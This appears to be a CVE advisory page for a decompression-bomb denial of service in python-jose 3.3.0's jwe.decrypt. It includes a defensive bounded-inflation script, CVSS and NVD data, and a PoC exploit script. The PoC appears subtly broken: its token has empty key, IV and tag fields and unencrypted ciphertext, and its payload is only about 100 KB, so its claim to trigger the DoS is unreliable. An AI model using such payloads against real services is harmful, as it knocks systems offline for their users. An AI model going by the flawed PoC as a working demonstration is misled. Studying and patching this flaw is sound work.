Security Vulnerability Report
CVE-2024-29370 CVSS 5.3 MEDIUM

CVE-2024-29370

Published: 2025-12-17 16:16:04
Last Modified: 2026-01-05 15:14:48

Description

In python-jose 3.3.0 (specifically jwe.decrypt), a vulnerability allows an attacker to cause a Denial-of-Service (DoS) condition by crafting a malicious JSON Web Encryption (JWE) token with an exceptionally high compression ratio. When this token is processed by the server, it results in significant memory allocation and processing time during decompression.
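The weakness recorded for this CVE is CWE-409 (data amplification): the inflated plaintext is allocated in full before anyone checks its size. The defensive counterpart, added here as an example and not python-jose's own code, is to inflate with an output cap so a stream whose plaintext would exceed the cap is rejected before the large allocation happens. The cap value MAX_PLAINTEXT_BYTES, the helper names and the sample payload are assumptions constructed for this example; raw_deflate=True selects RFC 1951 raw DEFLATE, which is what the JWE "zip":"DEF" header means per RFC 7516, while the default zlib-wrapped form matches what zlib.compress() in the PoC below produces.

```python
#!/usr/bin/env python3
"""Bounded DEFLATE inflation as a mitigation for decompression bombs (CWE-409).

Added example; not part of python-jose. The limit and helper names are
assumptions, and the sample payload is constructed for the demonstration.
"""
import zlib

# Assumed policy value: the largest plaintext this service will inflate.
MAX_PLAINTEXT_BYTES = 64 * 1024


class DecompressionLimitExceeded(ValueError):
    """Raised when the inflated output would exceed the configured cap."""


def bounded_inflate(data: bytes, max_bytes: int = MAX_PLAINTEXT_BYTES,
                    raw_deflate: bool = False) -> bytes:
    """Inflate `data` but never allocate more than max_bytes + 1 bytes of output.

    raw_deflate=True  -> RFC 1951 raw DEFLATE (wbits=-15), the encoding RFC 7516
                         specifies for "zip":"DEF".
    raw_deflate=False -> zlib-wrapped DEFLATE, which zlib.compress() produces.
    """
    wbits = -zlib.MAX_WBITS if raw_deflate else zlib.MAX_WBITS
    d = zlib.decompressobj(wbits)
    # max_length caps the output buffer: zlib stops inflating once the buffer is
    # full, so a bomb cannot force a huge allocation before we inspect the size.
    out = d.decompress(data, max_bytes + 1)
    if len(out) > max_bytes or d.unconsumed_tail:
        raise DecompressionLimitExceeded(
            f"inflated output exceeds {max_bytes} bytes; rejecting")
    if not d.eof:
        raise ValueError("truncated or malformed DEFLATE stream")
    return out


def inflates_within_limit(data: bytes, max_bytes: int = MAX_PLAINTEXT_BYTES,
                          raw_deflate: bool = False) -> bool:
    """True if the stream inflates within the cap, False if it would exceed it."""
    try:
        bounded_inflate(data, max_bytes, raw_deflate)
        return True
    except DecompressionLimitExceeded:
        return False


def make_sample(compressible_bytes: int) -> bytes:
    """Constructed sample: a JSON document with a long run of 'A' (compresses
    extremely well, which is exactly the property a bomb relies on)."""
    return b'{"data": "' + b"A" * compressible_bytes + b'"}'


def deflate_sample(compressible_bytes: int, raw_deflate: bool = False) -> bytes:
    """Compress make_sample() in either DEFLATE framing, at maximum level."""
    wbits = -zlib.MAX_WBITS if raw_deflate else zlib.MAX_WBITS
    c = zlib.compressobj(9, zlib.DEFLATED, wbits)
    return c.compress(make_sample(compressible_bytes)) + c.flush()


def demo() -> dict:
    """Show a legitimate payload passing and a bomb being rejected."""
    legit = deflate_sample(1_000)
    bomb = deflate_sample(5_000_000)  # ~5 MB inflated, a few KB compressed
    return {
        "legit_compressed": len(legit),
        "legit_inflated": len(bounded_inflate(legit)),
        "bomb_compressed": len(bomb),
        "bomb_rejected": not inflates_within_limit(bomb),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The cap is applied to the decompressor's output buffer rather than to the compressed input: the compressed size of a bomb tells you almost nothing about how large it inflates, which is the point of the attack. Setting max_length to one byte more than the cap lets the check distinguish "exactly at the limit" from "over it" without inflating anything further.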

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:python-jose_project:python-jose:3.3.0:*:*:*:*:*:*:* - VULNERABLE
python-jose 3.3.0 (jwe.decrypt function)
Other 3.x versions may also be affected

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2024-29370 PoC - python-jose JWE Decompression DoS
This PoC demonstrates the decompression bomb vulnerability in python-jose 3.3.0
"""
from jose import jwe
import base64
import zlib
import json


def create_decompression_bomb():
    """
    Create a malicious JWE token with high compression ratio
    The decompressed content can be extremely large (zip bomb style)
    """
    # Create a small payload that expands massively when decompressed
    # Using repeated patterns that compress extremely well
    small_payload = b'{"data": "' + b'A' * 100000 + b'"}' * 10

    # Compress the payload using DEFLATE
    compressed = zlib.compress(small_payload, level=9)

    # Create JWE structure with the compressed content
    # This follows the JWE standard format
    jwe_header = {
        "alg": "A128KW",
        "enc": "A128CBC-HS256",
        "zip": "DEF"  # Enable compression
    }

    # Encode header
    header_b64 = base64.urlsafe_b64encode(
        json.dumps(jwe_header).encode()
    ).decode().rstrip('=')

    # The compressed content becomes the JWE ciphertext
    ciphertext_b64 = base64.urlsafe_b64encode(compressed).decode().rstrip('=')

    # Create the JWE token format
    jwe_token = f"{header_b64}....{ciphertext_b64}"
    return jwe_token


def exploit(target_token):
    """
    Attempt to decrypt the malicious JWE token
    This will cause high memory/CPU usage
    """
    try:
        # This call may hang or crash due to decompression bomb
        plaintext = jwe.decrypt(target_token, 'secret-key')
        return plaintext
    except Exception as e:
        return f"Error: {e}"


if __name__ == "__main__":
    print("[*] Generating malicious JWE token for CVE-2024-29370")
    bomb_token = create_decompression_bomb()
    print(f"[*] Token length: {len(bomb_token)} bytes")
    print("[*] Attempting to decrypt (may cause DoS)...")
    result = exploit(bomb_token)
    print(f"[*] Result: {result}")

References

https://github.com/mpdavis/python-jose/issues/344 (Exploit, Issue Tracking, Patch)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-29370", "sourceIdentifier": "[email protected]", "published": "2025-12-17T16:16:04.457", "lastModified": "2026-01-05T15:14:48.077", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In python-jose 3.3.0 (specifically jwe.decrypt), a vulnerability allows an attacker to cause a Denial-of-Service (DoS) condition by crafting a malicious JSON Web Encryption (JWE) token with an exceptionally high compression ratio. When this token is processed by the server, it results in significant memory allocation and processing time during decompression."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-409"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:python-jose_project:python-jose:3.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "89A29F0D-0CC6-4177-8E90-B192A39EB233"}]}]}], "references": [{"url": "https://github.com/mpdavis/python-jose/issues/344", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch"]}]}}